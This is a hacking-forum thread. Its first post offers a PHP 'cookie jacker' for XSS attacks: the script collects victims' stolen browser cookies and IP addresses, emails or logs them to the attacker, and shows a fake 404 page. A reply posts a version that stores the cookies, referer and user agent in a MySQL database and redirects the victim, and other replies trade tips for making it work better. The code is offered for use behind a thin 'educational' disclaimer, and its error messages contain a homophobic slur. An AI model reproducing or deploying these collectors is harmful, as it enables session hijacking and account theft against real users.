Cookie Jacker - Written in PHP [XSS]

Name the file search.php. This will give the user the effect of a search page, like Google, but when it pops up, it will say 404 or a JavaScript alert saying you stole their cookies. It depends on your settings.

PHP Code:

<?php
// Settings //
$doNotify = 'no'; // Either yes or no
$emailAddr = '[email protected]'; // Your email address
$fileName = 'log.txt'; // Name of the file that logs the cookies
$EmailOrLog = 'email'; // Log type, email or log
// End Settings //

$notification = "<script>alert('All your cookie are mine.')</script>"; // Notification to be displayed IF doNotify is set to 'yes'
$fakePage = "<html><head><h1>404 File Not Found</h1></head></html>"; // 404 Page if doNotify is set to 'no'

if($doNotify != 'yes') {echo $notification;}else{echo $fakePage;}

$cookies = htmlspecialchars($_GET["request"]); // Gets user cookies from URL
$ipaddr = $_SERVER["REMOTE_ADDR"]; // Gets user IP address
$message = "IP Address: ".$ipaddr."\n Cookies: ".$cookies;

if($EmailOrLog != 'email') {
    mail($emailAddr,"Cookies",$message); // Mails cookie hijacker IF EmailOrLog is set to 'email'
}elseif($EmailOrLog != 'log'){
    $oven = fopen($fileName, "a"); // Logs to file IF EmailOrLog is set to 'log'
    fwrite($oven,$message);
    fclose($oven);
}
?>

Send the target to

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

Hope you like my script, and if you used it, hope it was effective enough for you.

Warning / Disclaimer: I am not responsible for any legal trouble you get an. This is on your hands. This jacker was made for educational purposes, hence the code was commented.

Use boolean logic, none of this string comparison stuff. It's both faster and cleaner.

Look into creating a database, bitches love databases.

(03-28-2014, 06:01 PM)Starfall Wrote:

[To see links please register here]

These have been done 69 times per hour by every Indonesian defacer in the world, but this is a nice effort.
I'll make one with DB later today, and a lookup page.

I'm new-ish to PHP, so thanks I suppose.

These have been done 69 times per hour by every Indonesian defacer in the world, but this is a nice effort.
I'll make one with DB later today, and a lookup page.

mysql> create table cookie ( id INT PRIMARY KEY AUTO_INCREMENT, ip VARCHAR(16), referer VARCHAR(1000), user_agent VARCHAR(1000), cookie VARCHAR(1000) );

PHP Code:

<?php

$redir = "http://google.com";

$sqlhost = "localhost";
$sqluser = "cookie";
$sqlpw = "cookie";
$sqldb = "cookie";

$db = mysql_connect($sqlhost, $sqluser, $sqlpw) or die ("your a faggot");
mysql_select_db($sqldb) or die("your a faggot");



strlen($_GET["c"]) or die("your a faggot"); // C is for Cookie. That's good enough for me.
$ip = $_SERVER["REMOTE_ADDR"];
$cookie = mysql_real_escape_string($_GET["c"]);
$referer = mysql_real_escape_string($_SERVER["HTTP_REFERER"]);
$ua = mysql_real_escape_string($_SERVER["HTTP_USER_AGENT"]);

$q = "INSERT INTO cookie(ip,cookie,referer,user_agent) VALUES('$ip', '$cookie', '$referer', '$ua');";
mysql_query($q);
header("Location: $redir");
?>

Why would you want to redirect a successful cookie steal to anything but the referer, minus the exploit string?

(03-29-2014, 07:19 PM)w00t Wrote:

[To see links please register here]

Why would you want to redirect a successful cookie steal to anything but the referer, minus the exploit string?

I dunno but I made it an option

cool thanks op i made one based on ur script

(04-13-2014, 06:47 PM)0xDEAD10CC Wrote:

[To see links please register here]

Why not use the existing 404 page if it exists? Also, $HTTP_GET_VARS is deprecated and has been superseded with $_GET. As w00t said though too, for options that only have 2 possibilities, why are you using strings instead of boolean?

I know $HTTP_GET_VARS has been deprecated. I wrote this on my computer, which at the time wasn't running version 5. Now I've gone ahead and just removed PHP as a whole. I would've updated this thread, but I'd rather not. #lazy

And I am using strings instead of booleans because meh.

>updated to get
>happy?

Why not use the existing 404 page if it exists? Also, $HTTP_GET_VARS is deprecated and has been superseded with $_GET. As w00t said though too, for options that only have 2 possibilities, why are you using strings instead of boolean?